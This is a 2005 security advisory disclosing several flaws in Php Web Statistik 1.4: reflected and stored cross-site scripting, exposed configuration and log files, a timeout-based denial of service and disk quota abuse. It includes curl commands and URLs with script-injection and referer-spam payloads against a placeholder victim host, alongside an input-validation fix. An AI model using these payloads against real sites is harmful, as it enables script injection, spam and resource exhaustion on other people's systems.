Php Web Statistik Multiple Vulnerabilities

 Name              Multiple Vulnerabilities in Php Web Statistik
 Systems Affected  Php Web Statistik (verified on 1.4)
 Severity          Medium Risk
 Vendor            www.php-web-statistik.de
 Advisory          http://www_ush_it/2005/11/19/php-web-statistik/
 Author            Francesco �??aScii�?? Ongaro (ascii at katamail . com)
 Date              20051119

I. BACKGROUND

Php Web Statistik is a php stats program, more information is
available at the vendor site.

II. DESCRIPTION

a) XSS

While lastnumber _GET var should be a positive integer no
input validation or casting assure this. Single quotes seems
to be scaped with a backslash (\').

stat.php?lastnumber=urlencoded%20text

b) Config exposure

The configuration file can be reached in the basepath by GET.

/stat/stat.cfg

directory=log/logdb.dta

c) Log database exposure

Using the value of "directory" in the configuration file you can
find the correct location of the whole database even when you
can't list directory contents.

d) Application level dos, resource usage

stat.php?lastnumber=big-int caused the script wit the php time
limit on our test machine.

e) XSS using the referer field

The value will be stored in the flat database file.

curl -A Opera http://the.vict.im/stat/pixel.php -e
"<a href=http://www.referer.spam>go-google</a>"

curl -A Opera http://the.vict.im/stat/pixel.php -e
"<script>alert(123123);</script>"

And shown on the backend (good news pr spammers).

f) Disk and quota misuse

The program don't rotate the db so you can misuse the remote
disk quota with multiple queries like this:

curl -A Opera http://www.vict.im/stat/pixel.php -e "WW[..]WWW"

Note the referer field can be >2kb.

III. ANALYSIS

This vulnerability can be exploited by a GET query.

stat.php?lastnumber=%3Cscript%3Ealert(123456789);%3C/script%3E

IV. DETECTION

Php Web Statistik 1.4 is vulnerable.
Older version not verified.

V. WORKAROUND

Input validation will fix the vulnerability. Cast (int)intval($input)
and limit the range (0-600 for example).

A collateral consequence of this is a small application
level dos (you just hit the SetTimeLimit value of the
php enviroment) as follow:

stat.php?lastnumber=2341694882134812734613478

last 2341694882134812734613478 hits

Fatal error: Maximum execution time of 30 seconds exceeded in
/var/www/localhost/htdocs/mambo/stat/stat.php on line 711
nr. timestamp hostname browser operating system site referrer

VI. VENDOR RESPONSE

Vendor invite you to download the new version from freewebstat.com.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051119 Bug discovered
20051119 Developer notification
20051119 Advisory released
20051121 Vendor response

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco "aScii" Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.